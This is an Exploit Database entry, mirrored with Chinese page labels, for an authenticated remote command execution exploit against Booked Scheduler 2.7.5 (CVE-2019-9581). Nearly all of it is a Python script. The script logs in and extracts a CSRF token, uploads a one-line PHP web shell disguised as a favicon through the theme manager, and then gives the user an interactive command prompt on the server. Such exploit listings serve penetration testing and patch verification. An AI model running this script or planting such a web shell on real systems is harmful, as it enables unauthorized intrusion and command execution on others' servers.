Booked Scheduler 2.7.5 – Remote Command Execution (RCE) (Authenticated)

• Exploit Database
• 14 阅读

• 作者： 0sunday
  日期： 2021-12-14
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50594/

• # Exploit Title: Booked Scheduler 2.7.5 - Remote Command Execution (RCE) (Authenticated)
  # Vulnerability founder: AkkuS
  # Date: 13/12/2021
  # Exploit Author: 0sunday
  # Vendor Homepage: https://www.bookedscheduler.com/
  # Software Link: N/A
  # Version: Booked Scheduler 2.7.5
  # Tester on: Kali 2021.2
  # CVE: CVE-2019-9581
  
  #!/usr/bin/python3
  
  import sys
  import requests
  from random import randint
  
  
  def login():
  	login_payload = {
  		"email": username,
  		"password": password,
  		"login": "submit",
  		#"language": "en_us"
  	}
  
  	login_req = request.post(
  		 target+"/booked/Web/index.php",
  		 login_payload,
  		 verify=False,
  		 allow_redirects=True
  	 )
  
  	if login_req.status_code == 200:
  		print ("[+] Logged in successfully.")
  	else:
  		print ("[-] Wrong credentials !")
  		exit()
  
  
  	return login_req.text.split('CSRF_TOKEN" value=')[1].split(";")[0].split('/')[0].split('"')[1]
  
  
  
  def upload_shell(csrf):
  
  	boundary = str(randint(123456789012345678901234567890, 999999999999999999999999999999))
  
  	_headers ={ "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
  				"Accept-Language": "en-US,en;q=0.5",
  				"X-Requested-With": "XMLHttpRequest",
  				"Content-Type": "multipart/form-data; boundary=---------------------------"+boundary,
  				"Origin": target,
  				"Connection": "close",
  				"Referer": target + "/booked/Web/admin/manage_theme.php?update"
  
  				}
  
  	data ="-----------------------------"+boundary+"\r\n"
  	data += "Content-Disposition: form-data; name=\"LOGO_FILE\"\r\n\n\n"
  	data += "-----------------------------"+boundary+"\r\n"
  	data += "Content-Disposition: form-data; name=\"FAVICON_FILE\"; filename=\"simple_shell.php\"\r\n"
  	data += "Content-Type: application/x-php\r\n\n"
  	data += "<?php $o = system($_REQUEST[\"cmd\"]);die?>\r\n\n"
  	data += "-----------------------------"+boundary+"\r\n"
  	data += "Content-Disposition: form-data; name=\"CSS_FILE\"\r\n\n\n"
  	data += "-----------------------------"+boundary+"\r\n"
  	data += "Content-Disposition: form-data; name=\"CSRF_TOKEN\"\r\n\n"
  	data += csrf + "\r\n"
  	data += "-----------------------------"+boundary+"--\r\n"
  
  	# In case you need some debugging
  	_proxies = {
  		'http': 'http://127.0.0.1:8080'
  	}
  
  	upload_req = request.post(
  		 target+"/booked/Web/admin/manage_theme.php?action=update",
  		 headers = _headers,
  		 data = data
  		 #proxies=_proxies
  		 )
  
  
  def shell():
  	shell_req = request.get(target+"/booked/Web/custom-favicon.php")
  
  	if shell_req.status_code == 200:
  
  		print("[+] Uploaded shell successfully")
  		print("[+] " + target + "/booked/Web/custom-favicon.php?cmd=")
  	else:
  		print("[-] Shell uploading failed")
  		exit(1)
  
  	print()
  	cmd = ''
  	while(cmd != 'exit'):
  		cmd = input("$ ")
  		shell_req = request.get(target+"/booked/Web/custom-favicon.php" + '?cmd='+cmd)
  		print(shell_req.text)
  
  
  if len(sys.argv) != 4:
  print ("[+] Usage : "+ sys.argv[0] + " https://target:port username password")
  exit()
  
  target = sys.argv[1]
  username = sys.argv[2]
  password = sys.argv[3]
  
  
  request = requests.session()
  
  csrf = login()
  upload_shell(csrf)
  shell()